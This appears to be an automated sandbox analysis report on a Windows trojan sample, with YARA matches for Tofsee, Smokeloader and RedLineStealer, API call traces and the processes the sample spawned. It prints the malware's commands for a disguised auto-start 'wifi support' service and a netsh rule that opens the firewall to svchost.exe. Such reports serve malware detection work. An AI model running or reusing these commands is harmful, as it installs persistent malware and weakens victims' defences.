Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_030FC913 | 15_2_030FC913
Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: String function: 0040EE2A appears 40 times
Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: String function: 00402544 appears 53 times
Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: String function: 026127AB appears 35 times
Source: 874A7cigvX.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.874A7cigvX.exe.2610e67.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
Source: 0.2.874A7cigvX.exe.2610e67.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
Source: 12.2.xvkslbws.exe.2d70e67.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
Source: 12.2.xvkslbws.exe.2d70e67.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
Source: 0.2.874A7cigvX.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
Source: 0.2.874A7cigvX.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
Source: 0.3.874A7cigvX.exe.2630000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
Source: 0.3.874A7cigvX.exe.2630000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
Source: 15.2.svchost.exe.30f0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
Source: 15.2.svchost.exe.30f0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
Source: 12.2.xvkslbws.exe.2d70e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
Source: 12.2.xvkslbws.exe.2d70e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
Source: 12.2.xvkslbws.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
Source: 12.2.xvkslbws.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
Source: 0.3.874A7cigvX.exe.2630000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.3.874A7cigvX.exe.2630000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.2.874A7cigvX.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.2.874A7cigvX.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.2.874A7cigvX.exe.2610e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.2.874A7cigvX.exe.2610e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 12.2.xvkslbws.exe.2df0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 12.2.xvkslbws.exe.2df0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 12.2.xvkslbws.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 12.2.xvkslbws.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 12.3.xvkslbws.exe.2d90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 12.3.xvkslbws.exe.2d90000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 15.2.svchost.exe.30f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 15.2.svchost.exe.30f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 12.2.xvkslbws.exe.2df0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 12.2.xvkslbws.exe.2df0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 12.3.xvkslbws.exe.2d90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 12.3.xvkslbws.exe.2d90000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0000000C.00000002.2086252389.0000000002622000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000000.00000002.2081266908.0000000002669000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 874A7cigvX.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engine | Classification label: mal100.troj.evad.winEXE@22/3@9/5
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError,0_2_00406A60
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_02679066 CreateToolhelp32Snapshot,Module32First,0_2_02679066
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Code function: 12_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,12_2_00409A6B
        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_030F9A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,15_2_030F9A6B
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2724:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3680:120:WilError_03
        Source: C:\Users\user\Desktop\874A7cigvX.exe | File created: C:\Users\user\AppData\Local\Temp\xvkslbws.exe
        Source: C:\Users\user\Desktop\874A7cigvX.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: 874A7cigvX.exe | Virustotal: Detection: 67%
        Source: 874A7cigvX.exe | ReversingLabs: Detection: 68%
        Source: C:\Users\user\Desktop\874A7cigvX.exe | File read: C:\Users\user\Desktop\874A7cigvX.exe
        Source: unknown | Process created: C:\Users\user\Desktop\874A7cigvX.exe "C:\Users\user\Desktop\874A7cigvX.exe"
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ycgeofkw\
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xvkslbws.exe" C:\Windows\SysWOW64\ycgeofkw\
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support"
        Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" description ycgeofkw "wifi internet conection"
        Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ycgeofkw
        Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d"C:\Users\user\Desktop\874A7cigvX.exe"
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
        Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: msimg32.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: dbghelp.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: msvcr100.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: edputil.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: appresolver.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: bcp47langs.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: slc.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: sppc.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Section loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Section loaded: msimg32.dll
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Section loaded: dbghelp.dll
